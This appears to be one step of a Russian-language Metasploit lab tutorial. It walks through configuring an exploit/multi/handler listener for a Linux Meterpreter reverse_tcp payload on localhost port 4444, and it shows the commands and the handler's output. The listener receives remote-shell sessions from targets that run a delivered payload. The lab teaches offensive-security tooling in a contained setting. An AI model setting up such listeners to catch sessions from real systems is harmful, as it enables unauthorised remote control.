Настройка прослушивателя Meterpreter
На этом заключительном этапе вы научитесь настраивать прослушиватель (listener) для полезной нагрузки Meterpreter. Meterpreter — это продвинутая, многофункциональная полезная нагрузка, предоставляющая интерактивную оболочку в целевой системе. Вместо запуска эксплойта вы будете использовать модуль exploit/multi/handler для ожидания входящих соединений. Это полезно, когда эксплойт доставляется другими способами (например, через вредоносный файл) и вам нужно «поймать» обратное соединение.
Сначала переключитесь на модуль multi/handler.
use exploit/multi/handler
Приглашение командной строки изменится, отражая новый модуль.
msf6 exploit(multi/handler) >
Затем установите полезную нагрузку Meterpreter. Мы будем использовать ту, что предназначена для систем Linux. Имя нагрузки linux/x86/meterpreter/reverse_tcp следует логической структуре: <платформа>/<архитектура>/<тип>/<протокол>. Она указывает на платформу Linux, архитектуру x86, тип полезной нагрузки Meterpreter и протокол обратного TCP-соединения.
set payload linux/x86/meterpreter/reverse_tcp
Теперь настройте параметры прослушивателя, LHOST и LPORT, так же, как вы делали это ранее.
set LHOST 127.0.0.1
Примечание: Вы можете увидеть предупреждение о привязке к адресу обратной петли (loopback). Это нормально при использовании localhost (127.0.0.1), и для данной лабораторной работы его можно смело игнорировать.
set LPORT 4444
Наконец, запустите прослушиватель с помощью команды exploit.
exploit
Metasploit запустит прослушиватель на указанном IP-адресе и порту, ожидая подключения сессии Meterpreter.
[*] Started reverse TCP handler on 127.0.0.1:4444
Консоль останется активной, ожидая соединения. В реальном сценарии, если бы целевая машина выполнила соответствующую полезную нагрузку Meterpreter, здесь была бы установлена сессия. Поскольку в этой лабораторной работе ни одна цель не подключится, вы можете остановить прослушиватель, нажав Ctrl + C.
Чтобы выйти из консоли Metasploit, введите exit и нажмите Enter.